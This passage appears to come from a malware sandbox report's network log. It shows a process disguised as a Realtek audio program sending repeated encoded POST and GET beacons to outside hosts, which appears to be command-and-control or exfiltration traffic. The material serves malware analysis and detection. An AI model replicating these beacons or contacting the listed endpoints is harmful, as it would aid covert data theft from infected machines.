                                                                                  Data Raw: 35 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 65 61 72 62 75 64 73 [TRUNCATED]
                                                                                  Data Ascii: 50a<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.earbudsstore.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.earbudsstore.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1733328730.9784753976&other_args=eyJ1cmkiOiAiLzBnaXMiLCAiYXJncyI6ICJoN2ktPXRadHgmSVVZPWFNcmNnL3ZuMkcvblZybmNSTW05c2cvOXdFWkxwUFRDdURoVU9UajJvY1dyUVhrb1BIRmJsbjVGbUxvVGFXWTc0S1JvV2tYU1pVU2JqMmRDMXFXYmVVLy9lZ3A0Wm9Wcnh3RWNacWlkRmE1ZWRqRmJaR2ZzS1ZVPSIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGl [TRUNCATED]
                                                                                  Dec 4, 2024 17:12:10.565480947 CET169INData Raw: 4d 43 34 33 49 69 77 67 49 6e 56 79 61 56 39 6a 49 6a 6f 67 49 6d 4d 34 4d 6d 4d 69 4c 43 41 69 59 58 4a 6e 63 31 39 6a 49 6a 6f 67 49 6a 59 78 59 57 55 69 4c 43 41 69 63 6d 56 6d 5a 58 4a 6c 63 6c 39 6a 49 6a 6f 67 49 6d 59 31 59 6d 55 69 4c 43
                                                                                  Data Ascii: MC43IiwgInVyaV9jIjogImM4MmMiLCAiYXJnc19jIjogIjYxYWUiLCAicmVmZXJlcl9jIjogImY1YmUiLCAiYWNjZXB0X2MiOiAiNGNmYyJ9"; } </script> </body></html>0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.11.2049731103.230.159.86807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:16.513739109 CET775OUTPOST /bwyw/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.superiorfencing.net
                                                                                  Origin: http://www.superiorfencing.net
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.superiorfencing.net/bwyw/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 34 32 45 46 33 48 6c 6a 65 4a 47 53 38 4e 69 33 70 6f 50 33 4e 54 6a 2b 6d 52 59 71 7a 41 2b 61 77 6a 47 5a 32 6f 73 31 4f 5a 43 6b 59 59 5a 57 37 36 47 46 45 66 78 78 38 4e 61 4f 44 47 7a 55 73 35 57 4b 59 49 31 68 53 49 66 66 42 78 56 33 4e 30 78 72 51 61 34 45 35 32 41 54 49 52 4b 72 55 35 56 71 45 36 6a 52 56 78 72 37 63 43 6b 4b 78 4f 57 6b 4d 5a 77 6a 4d 73 79 34 59 45 39 37 66 55 47 32 67 70 5a 46 71 6f 75 63 55 45 43 76 71 44 52 4d 63 71 35 36 6d 4d 4f 61 72 72 56 75 47 4b 37 79 50 77 4e 72 7a 73 6e 6c 71 65 75 35 4e 65 33 74 50 41 3d 3d
                                                                                  Data Ascii: IUY=+cCAFC3M4Oqm42EF3HljeJGS8Ni3poP3NTj+mRYqzA+awjGZ2os1OZCkYYZW76GFEfxx8NaODGzUs5WKYI1hSIffBxV3N0xrQa4E52ATIRKrU5VqE6jRVxr7cCkKxOWkMZwjMsy4YE97fUG2gpZFqoucUECvqDRMcq56mMOarrVuGK7yPwNrzsnlqeu5Ne3tPA==
                                                                                  Dec 4, 2024 17:12:16.857515097 CET479INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:12:16 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.11.2049732103.230.159.86807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:19.382318020 CET795OUTPOST /bwyw/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.superiorfencing.net
                                                                                  Origin: http://www.superiorfencing.net
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.superiorfencing.net/bwyw/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 61 61 77 43 32 5a 33 70 73 31 50 5a 43 6b 54 34 59 63 6c 4b 47 4f 45 66 4e 48 38 49 69 4f 44 47 6e 55 73 38 79 4b 5a 35 31 69 54 59 66 64 41 42 56 31 53 6b 78 72 51 61 34 45 35 32 55 39 49 58 69 72 56 4b 64 71 47 59 48 57 4b 42 72 34 5a 43 6b 4b 31 4f 57 67 4d 5a 78 32 4d 74 65 47 59 48 4a 37 66 56 32 32 67 34 5a 47 39 34 76 32 62 6b 44 43 6b 32 30 2b 62 4b 31 65 6a 73 65 6d 69 49 4a 49 4f 38 32 6f 53 43 35 50 77 2f 37 58 75 75 58 52 50 63 32 32 53 4f 6f 74 78 4a 6e 7a 53 59 33 7a 6c 46 63 55 7a 4a 65 4d 6e 4b 6f 3d
                                                                                  Data Ascii: IUY=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzaawC2Z3ps1PZCkT4YclKGOEfNH8IiODGnUs8yKZ51iTYfdABV1SkxrQa4E52U9IXirVKdqGYHWKBr4ZCkK1OWgMZx2MteGYHJ7fV22g4ZG94v2bkDCk20+bK1ejsemiIJIO82oSC5Pw/7XuuXRPc22SOotxJnzSY3zlFcUzJeMnKo=
                                                                                  Dec 4, 2024 17:12:19.726087093 CET479INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:12:19 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.11.2049733103.230.159.86807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:22.258177042 CET1289OUTPOST /bwyw/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.superiorfencing.net
                                                                                  Origin: http://www.superiorfencing.net
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 7368
                                                                                  Connection: close
                                                                                  Referer: http://www.superiorfencing.net/bwyw/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 53 61 78 30 69 5a 32 4b 55 31 64 4a 43 6b 51 34 59 64 6c 4b 47 58 45 62 68 62 38 49 2f 37 44 45 66 55 71 66 4b 4b 65 4b 74 69 63 59 66 64 4c 68 56 30 4e 30 77 72 51 62 4a 4e 35 32 45 39 49 58 69 72 56 4b 78 71 43 4b 6a 57 5a 52 72 37 63 43 6b 65 78 4f 58 46 4d 5a 6f 42 4d 74 61 57 59 78 35 37 66 31 6d 32 6a 4b 78 47 69 49 76 30 59 6b 44 61 6b 32 77 6c 62 4f 64 53 6a 73 72 42 69 4c 70 49 4c 49 47 30 4e 79 31 6a 68 76 36 62 70 36 50 58 46 4b 2b 6b 55 66 30 77 78 66 48 4f 4f 39 2f 6f 67 31 55 70 72 70 4b 74 6c 61 41 6e 32 41 39 78 72 4b 67 58 6c 35 6d 5a 35 6a 6b 58 4d 79 6b 55 30 37 78 42 5a 5a 63 73 39 65 5a 42 75 6d 73 2f 7a 78 74 69 49 2b 6d 78 49 74 4f 61 67 4b 63 34 2f 35 79 58 6e 53 44 54 41 41 56 36 4b 67 65 35 75 32 63 4c 6a 67 7a 34 42 6e 47 61 38 61 37 4c 59 4d 71 6a 43 33 75 6a 72 57 63 4d 4a 70 32 62 70 67 49 70 42 68 69 43 73 56 42 33 35 74 77 7a 56 34 [TRUNCATED]
                                                                                  Data Ascii: IUY=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzSax0iZ2KU1dJCkQ4YdlKGXEbhb8I/7DEfUqfKKeKticYfdLhV0N0wrQbJN52E9IXirVKxqCKjWZRr7cCkexOXFMZoBMtaWYx57f1m2jKxGiIv0YkDak2wlbOdSjsrBiLpILIG0Ny1jhv6bp6PXFK+kUf0wxfHOO9/og1UprpKtlaAn2A9xrKgXl5mZ5jkXMykU07xBZZcs9eZBums/zxtiI+mxItOagKc4/5yXnSDTAAV6Kge5u2cLjgz4BnGa8a7LYMqjC3ujrWcMJp2bpgIpBhiCsVB35twzV4a8X/PoZkPhkdYny6sy44zt8r3oXIs4AlJkQAJtxIukNLDiJpzxJHihcGwFMR2CxINt895yl6lcIspfDdCf5Hmocqz8oyWZeBGCFcWtBjOhETjjxUkzJtEji1JPzYh7t5OS+VY0SL/VHKPHZtnRA5eXVuqMGkrjeKwrrQpb6/z7k7jJr8W9Wp1o1AsheHFSQDkORygbWPH19xDjhHNKsMpp8QjW7kzwgu0885Ctw/ZA2A3dNXX58pPwpCE4IR6tlqZWqAfwfztGFPc1Nlkr0hIuWJr9aFRek0vfsDNpPES5vAmLuZUgI4aOS9G6k02VUVPWPa+1I+yOERY69S9o6jq9TU9w5v3x/pASb5/7xVveLtEUjZQUFG+99
                                                                                  Dec 4, 2024 17:12:22.258255959 CET6655OUTData Raw: 70 6f 75 4b 72 77 4f 41 6a 39 6a 54 4f 31 56 44 45 78 42 64 71 7a 38 57 42 54 44 4e 70 70 45 7a 35 6c 39 33 67 37 75 2b 44 78 67 69 77 5a 49 68 69 64 6d 66 79 67 45 75 35 31 55 42 4a 36 66 46 35 77 42 4d 6b 54 6c 36 6a 78 52 6b 34 67 36 50 77 72
                                                                                  Data Ascii: pouKrwOAj9jTO1VDExBdqz8WBTDNppEz5l93g7u+DxgiwZIhidmfygEu51UBJ6fF5wBMkTl6jxRk4g6PwrbFpuO8L4o80T9nr55HepHGs2iAVgxoUZo/vSxsEc84mmHCZ0mUyeA7nDHdRm5aKPQ+R20HutkxFym9ccts2xLtdRAPuY5eHJAnuVm+jPKBNTnQpFH3HRj47hFtX9euY7G5N0Uzv1wB7EQZYisFvCXLI3nJGNWDtQq
                                                                                  Dec 4, 2024 17:12:22.602180958 CET479INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:12:22 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.11.2049734103.230.159.86807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:25.129961967 CET495OUTGET /bwyw/?IUY=zeqgG3zf3rSD22A0zF5wS4zK0N2/jqmuTT/213oW5xKBpEmM0JRqJaWJcKUMxr+7Esc9obOTS2jlvNaYH8wfaL2cIGBALQwkeJY/zX4xE0yHRYNxEJGWTyE=&h7i-=tZtx HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.superiorfencing.net
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:12:25.474129915 CET479INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:12:25 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.11.2049735172.67.180.246807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:30.749871969 CET778OUTPOST /2nga/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.beylikduzu616161.xyz
                                                                                  Origin: http://www.beylikduzu616161.xyz
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 64 30 73 37 7a 51 51 51 72 62 36 53 66 43 6c 39 55 5a 77 6d 76 74 64 4f 58 55 69 4e 50 73 6c 6d 41 33 43 6f 67 64 67 67 30 55 51 78 56 6d 77 73 49 41 4a 65 39 34 32 6b 30 57 46 69 37 65 37 51 4e 48 76 67 33 34 7a 34 58 62 2b 75 6d 62 65 2f 4b 66 4b 41 43 65 30 44 4c 33 48 4f 78 6a 6d 41 55 4b 6d 38 58 6e 4c 50 4c 61 6d 53 32 6b 59 6f 77 55 33 6e 42 37 54 75 54 73 4a 61 5a 34 6e 43 50 73 51 5a 69 47 44 4c 2f 6f 76 53 6b 6c 6c 73 6a 38 36 4f 78 64 76 45 63 53 52 73 58 44 77 61 49 46 4b 42 48 39 58 34 4d 62 76 57 53 73 6a 7a 6c 35 4f 7a 6e 78 77 2f 72 45 45 52 64 58 7a 70 2f 77 3d 3d
                                                                                  Data Ascii: IUY=d0s7zQQQrb6SfCl9UZwmvtdOXUiNPslmA3Cogdgg0UQxVmwsIAJe942k0WFi7e7QNHvg34z4Xb+umbe/KfKACe0DL3HOxjmAUKm8XnLPLamS2kYowU3nB7TuTsJaZ4nCPsQZiGDL/ovSkllsj86OxdvEcSRsXDwaIFKBH9X4MbvWSsjzl5Oznxw/rEERdXzp/w==
                                                                                  Dec 4, 2024 17:12:31.171091080 CET859INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:12:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20m6JU3rRgAUMkqkd%2FM23ngdVPbfAwuGr0H%2FdmsEKRm9JSP2Gs64%2FhHUTTDSUbgL4E2WlApW1P4CwzvqX1H53A0SdOh%2BYXdfA866x%2B%2F%2BCOvBPZe4MuYg48NjwcYQe7i2XZh6F1UpD14xF8c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd14148f26d9fd-MIA
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=123993&min_rtt=123993&rtt_var=61996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                  Data Ascii: 14
                                                                                  Dec 4, 2024 17:12:31.171140909 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.11.2049736172.67.180.246807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:33.411323071 CET798OUTPOST /2nga/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.beylikduzu616161.xyz
                                                                                  Origin: http://www.beylikduzu616161.xyz
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 38 78 56 48 41 73 4a 42 4a 65 2b 34 32 6b 73 6d 46 74 6d 4f 36 39 4e 48 69 66 33 36 33 34 58 61 65 75 6d 5a 32 2f 4b 73 69 48 4e 75 30 57 4e 33 48 41 2b 44 6d 41 55 4b 6d 38 58 6e 66 31 4c 65 4b 53 32 56 49 6f 77 77 6a 6b 50 62 54 76 53 73 4a 61 64 34 6e 47 50 73 51 76 69 48 65 51 2f 75 72 53 6b 6b 56 73 67 6f 4f 52 2f 64 75 42 53 79 52 2f 62 57 45 53 4a 56 71 32 43 64 58 43 4e 72 2f 52 58 36 75 70 34 4c 36 58 6b 69 73 4e 76 30 39 35 66 56 79 79 69 31 41 75 32 4a 4c 75 4f 37 4a 34 78 4b 37 6d 33 35 4a 65 59 79 45 3d
                                                                                  Data Ascii: IUY=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g8xVHAsJBJe+42ksmFtmO69NHif3634XaeumZ2/KsiHNu0WN3HA+DmAUKm8Xnf1LeKS2VIowwjkPbTvSsJad4nGPsQviHeQ/urSkkVsgoOR/duBSyR/bWESJVq2CdXCNr/RX6up4L6XkisNv095fVyyi1Au2JLuO7J4xK7m35JeYyE=
                                                                                  Dec 4, 2024 17:12:33.802166939 CET855INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:12:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wepykIrR%2FyKhhsc7nOKtcvidRB0J34ZBBBvq%2BOZiXDEu1ExM0L59hfu78dqoAT1X0TusOf9aXErdfLIBwvwXblNvy1Ea2UflpsfUxUmT7%2Bq%2FA7Jz7kt01wsk3U1cdL%2Bh8yCxnjJc5gE6R3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
